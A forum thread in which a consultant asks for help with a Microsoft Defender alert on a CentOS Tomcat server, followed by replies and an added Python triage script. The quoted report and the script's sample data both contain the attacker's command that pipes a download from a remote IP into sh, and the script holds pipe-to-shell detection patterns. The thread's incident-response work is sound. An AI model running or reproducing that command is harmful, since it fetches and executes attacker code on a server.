Suspicious process executed by a network service on CentOS 7.9
Hello community members,
I am an Azure consultant and I have a customer who is getting the "Suspicious process executed by a network service on CentOS 7.9" Microsoft Defender for Cloud high severity alert.

Environment: Apache Tomcat web server running on CentOS 7.9.

We have downloaded the Defender report, which is as follows:

[7402] java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Command line: /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre//bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Process id: 7402
Image file path: /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre/bin/java
Image file SHA1: 2bffb1d3d46365ca0e78f96577123814b54dbe88
Image file last modification time: May 15, 2023 8:25:05 PM
Image file: java
Effective user: tomcat

1/6/2024 9:11:14 PM
[7402] bash /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh"
Command line: /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh"
Process id: 7402
Image file path: /usr/bin/bash
Image file SHA1: 9ad737cbd8bbdddc96726156dbd3bc03936bf02f
Image file last modification time: Nov 24, 2021 10:03:27 PM
Mitre techniques: T1505: Server Software Component, T1059: Command and Scripting Interpreter, T1059.004: Unix Shell, T1505.003: Web Shell, T1190: Exploit Public-Facing Application
Image file: bash
Effective user: tomcat
Referenced in commandline: http://222.108.161.27:7070/docs/da.txt
Referenced in commandline: 222.108.161.27

I need help to identify what is happening here. Is the process happening within Tomcat or outside Tomcat (over the public IP)?
Have you looked at the file being curled, and the pastebin data it references? Yes, I'd say something nefarious is going on here.
Someone is at least attempting to start a shell process, and it looks like they're exploiting a vulnerability in Tomcat (edit: or the Java application it's running) in order to do so.
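The question of "inside or outside Tomcat" comes down to three fields in the quoted report: the image of the process that spawned the shell, the effective user the shell ran as, and whether the command line pipes a remote download into an interpreter. The following is an added triage example, written for this thread and not code from either poster or from Microsoft Defender; it parses constructed process-event records transcribed from the report above and flags the ones a defender should escalate. The parent-image link between the java and bash entries is an assumption (the report groups the bash entry under the java process but prints no parent pid), and the account and image name lists are illustrative.

```python
"""Flag shell processes tied to a web-service account that pipe remote content
into an interpreter. Added example for the thread above, not the page's own code."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Illustrative name lists (an assumption for this example, tune per environment).
SHELLS = {"sh", "bash", "dash", "zsh"}
SERVICE_ACCOUNTS = {"tomcat", "www-data", "apache", "nginx"}
WEB_SERVICE_IMAGES = {"java", "httpd", "nginx"}

# "curl ... | sh" style: a downloader whose output is piped into a shell.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|dash|zsh)\b")
URL = re.compile(r"https?://[^\s\"']+")


@dataclass
class ProcessEvent:
    pid: int
    image: str              # basename of "Image file" in the report
    cmdline: str            # "Command line"
    effective_user: str     # "Effective user"
    parent_image: str = ""  # basename of the parent's image, if the sensor provides it


@dataclass
class Finding:
    pid: int
    reasons: list[str] = field(default_factory=list)
    referenced_urls: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def analyse(event: ProcessEvent) -> Finding:
    """Return a Finding listing every reason this event warrants escalation."""
    finding = Finding(pid=event.pid, referenced_urls=URL.findall(event.cmdline))
    if event.image in SHELLS and event.parent_image in WEB_SERVICE_IMAGES:
        # A shell child of the web server process: the activity is inside the service.
        finding.reasons.append(
            f"shell '{event.image}' spawned by web service '{event.parent_image}'")
    if event.image in SHELLS and event.effective_user in SERVICE_ACCOUNTS:
        # Running as the service account means the web application's privileges were used.
        finding.reasons.append(
            f"shell running under service account '{event.effective_user}'")
    if PIPE_TO_SHELL.search(event.cmdline):
        finding.reasons.append("remote content piped into a shell interpreter")
    return finding


def triage(events: list[ProcessEvent]) -> list[Finding]:
    """Keep only the events that produced at least one reason."""
    return [f for f in (analyse(e) for e in events) if f.suspicious]


# Constructed sample events transcribed from the report quoted in the post.
# The java command line is abbreviated; parent_image="java" is an assumption.
SAMPLE_EVENTS = [
    ProcessEvent(
        pid=7402, image="java", effective_user="tomcat",
        cmdline=("/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre/bin/java "
                 "-Dcatalina.home=/opt/tomcat org.apache.catalina.startup.Bootstrap start"),
    ),
    ProcessEvent(
        pid=7402, image="bash", effective_user="tomcat", parent_image="java",
        cmdline='/bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh"',
    ),
    # Constructed benign control: an administrator's shell over SSH, unrelated to Tomcat.
    ProcessEvent(
        pid=9001, image="bash", effective_user="root", parent_image="sshd",
        cmdline="bash -c 'systemctl status tomcat'",
    ),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"pid {f.pid}: " + "; ".join(f.reasons))
        for url in f.referenced_urls:
            print(f"  references {url}")
```

Run against the sample, only the bash entry is returned, with all three reasons and the referenced URL, while the java parent and the SSH control shell produce nothing. In a real deployment the same checks would be fed from the sensor's process-creation events (with a genuine parent pid rather than the assumed link), and the referenced URL and host would be the values to search for across other hosts' outbound connection logs.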